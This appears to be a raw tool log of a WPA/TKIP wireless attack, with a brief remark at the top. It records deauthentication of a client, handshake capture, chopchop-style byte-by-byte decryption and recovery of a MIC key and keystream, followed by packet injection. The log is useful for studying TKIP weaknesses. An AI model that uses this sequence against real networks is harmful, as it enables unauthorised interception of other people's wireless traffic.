The WPA "Gone in 900 seconds" will become reality eventually... Blub 2:38 E6 38 1C 24 15 1C CF Blub 1:17 DD 0D 69 1D C3 1F EE Blub 3:29 31 79 E7 E6 CF 8D 5E 19:04:52 Michael Test: Successful 19:04:52 Waiting for beacon frame (BSSID: 00:1E:7D:54:DF:F2) on channel 7 19:04:52 Found specified AP 19:04:52 WPA handshake: 00:1D:7E:56:FD:F6 captured73:D7:CA:88] [20| 2 ACKs] 19:04:52 Sending 4 directed DeAuth. STMAC: [00:1A:73:D7:CA:88] [22| 3 ACKs] 19:04:53 Waiting for an ARP packet coming from the Client... Saving chosen packet in replay_src-0217-190458.cap 19:04:58 Waiting for an ARP response packet coming from the AP... Saving chosen packet in replay_src-0217-190458.cap 19:08:25 Offset 93 ( 0% done) | xor = 80 | pt = 43 | 252 frames written in 206998ms 19:11:27 Offset 92 ( 1% done) | xor = FC | pt = 85 | 153 frames written in 125364ms 19:15:08 Offset 91 ( 3% done) | xor = 84 | pt = AD | 200 frames written in 164038ms 19:19:17 Offset 90 ( 5% done) | xor = 9A | pt = 84 | 236 frames written in 193658ms 19:20:19 Offset 89 ( 7% done) | xor = 88 | pt = A5 | 2 frames written in 1639ms 19:22:28 Offset 88 ( 9% done) | xor = 68 | pt = 94 | 86 frames written in 70487ms 19:24:30 Offset 87 (11% done) | xor = 35 | pt = A0 | 78 frames written in 63926ms 19:26:59 Offset 86 (12% done) | xor = DC | pt = E7 | 111 frames written in 90966ms 19:31:18 Offset 85 (14% done) | xor = 1A | pt = 21 | 248 frames written in 203533ms 19:34:49 Offset 84 (16% done) | xor = 96 | pt = 7D | 188 frames written in 154168ms 19:36:54 Offset 83 (18% done) | xor = D8 | pt = 46 | 81 frames written in 66386ms 19:38:50 Offset 82 (20% done) | xor = 9A | pt = D7 | 70 frames written in 57372ms 19:40:05 Offset 81 (22% done) | xor = 17 | pt = 00 | 19 frames written in 15574ms 19:43:38 Offset 80 (24% done) | xor = 00 | pt = 00 | 190 frames written in 155810ms 19:47:54 Offset 79 (25% done) | xor = 46 | pt = 67 | 245 frames written in 201083ms 19:50:37 Offset 78 (27% done) | xor = D7 | pt = 5D | 129 frames written in 105738ms 19:53:14 Offset 77 (29% done) | xor = 96 | pt = 87 | 120 frames written in 98299ms 19:54:17 Offset 76 (31% done) | xor = CD | pt = 00 | 4 frames written in 3277ms 19:57:46 Offset 75 (33% done) | xor = E3 | pt = 10 | 186 frames written in 152503ms 20:00:42 Offset 74 (35% done) | xor = ED | pt = 50 | 144 frames written in 118009ms 20:03:07 Offset 73 (37% done) | xor = CC | pt = 16 | 106 frames written in 86870ms 20:04:17 Offset 72 (38% done) | xor = 0E | pt = DB | 13 frames written in 10658ms 20:07:49 Offset 71 (40% done) | xor = 8A | pt = 3B | 190 frames written in 155806ms 20:09:53 Offset 70 (42% done) | xor = 82 | pt = B2 | 80 frames written in 65565ms 20:14:37 Offset 69 (44% done) | xor = A5 | pt = 9E | 203 frames written in 166504ms 20:18:47 Offset 68 (46% done) | xor = 11 | pt = 92 | 236 frames written in 193673ms 20:19:51 Offset 67 (48% done) | xor = C4 | pt = 37 | 4 frames written in 3279ms 20:21:20 Offset 66 (50% done) | xor = DE | pt = 48 | 36 frames written in 29506ms 20:22:35 Offset 65 (51% done) | xor = EA | pt = F3 | 17 frames written in 14445ms Sleeping for 60 seconds.31 bytes still unknown ARP Reply Checking 192.168.x.y Checking 10.x.y.z Sent 772 packets, current guess: 00...20:33:54 Moved one step backwards to chop the last byte again. 20:35:50 Offset 65 (51% done) | xor = 97 | pt = 8E | 144 frames written in 118024ms 20:38:30 Offset 64 (53% done) | xor = 87 | pt = C2 | 125 frames written in 102432ms 20:41:45 Offset 63 (55% done) | xor = B7 | pt = 50 | 167 frames written in 136874ms 20:43:46 Offset 62 (57% done) | xor = 59 | pt = 00 | 76 frames written in 62291ms 20:47:41 Offset 61 (59% done) | xor = 9B | pt = 8E | 217 frames written in 178036ms 20:49:48 Offset 60 (61% done) | xor = 5B | pt = 01 | 84 frames written in 68849ms 20:51:23 Offset 59 (62% done) | xor = 96 | pt = A8 | 43 frames written in 35248ms 20:53:01 Offset 58 (64% done) | xor = 21 | pt = C0 | 47 frames written in 38524ms 20:54:16 Offset 57 (66% done) | xor = 94 | pt = 53 | 18 frames written in 14753ms 20:58:07 Offset 56 (68% done) | xor = FA | pt = 93 | 213 frames written in 174742ms 21:00:22 Offset 55 (70% done) | xor = 23 | pt = 55 | 94 frames written in 77040ms 21:02:43 Offset 54 (72% done) | xor = D8 | pt = D1 | 101 frames written in 82771ms 21:06:44 Offset 53 (74% done) | xor = B9 | pt = 81 | 225 frames written in 184617ms 21:09:34 Offset 52 (75% done) | xor = 7B | pt = BA | 137 frames written in 112264ms 21:13:27 Offset 51 (77% done) | xor = 5D | pt = 06 | 216 frames written in 177202ms 21:17:13 Offset 50 (79% done) | xor = C7 | pt = 32 | 207 frames written in 169794ms 21:19:30 Offset 49 (81% done) | xor = 5F | pt = 00 | 95 frames written in 77854ms 21:21:24 Offset 48 (83% done) | xor = EA | pt = 00 | 67 frames written in 54911ms 21:22:33 Offset 47 (85% done) | xor = A3 | pt = 6C | 11 frames written in 9603ms Sleeping for 60 seconds.13 bytes still unknown ARP Reply Checking 192.168.x.y Checking 10.x.y.z Sent 772 packets, current guess: 00...21:33:52 Moved one step backwards to chop the last byte again. 21:34:57 Offset 47 (85% done) | xor = 80 | pt = 4F | 81 frames written in 66390ms 21:36:09 Offset 46 (87% done) | xor = 45 | pt = A7 | 15 frames written in 12292ms Sent 515 packets, current guess: 00... The AP appears to drop packets shorter than 46 bytes. Enabling standard workaround: IP header re-creation. This doesn't look like an IP packet, try another one. Warning: ICV checksum verification FAILED! Trying workaround. The AP appears to drop packets shorter than 46 bytes. Enabling standard workaround: IP header re-creation. This doesn't look like an IP packet, try another one. Workaround couldn't fix ICV checksum. Packet is most likely invalid/useless Try another one. 21:44:03 Reversed MIC Key (FromDS): 2A:C3:4E:17:18:24:BD:CA Saving plaintext in replay_dec-0217-214403.cap Saving keystream in replay_dec-0217-214403.xor 21:44:03 Completed in 9540s (0.01 bytes/s) 21:44:03 AP MAC: 32:06:BA:81:D1:55 IP: 147.***.***.168 21:44:03 Client MAC: 00:1A:73:D7:CA:88 IP: 72.**.***.158 21:44:03 Sent encrypted tkip ARP request to the client. |
 | |
|
|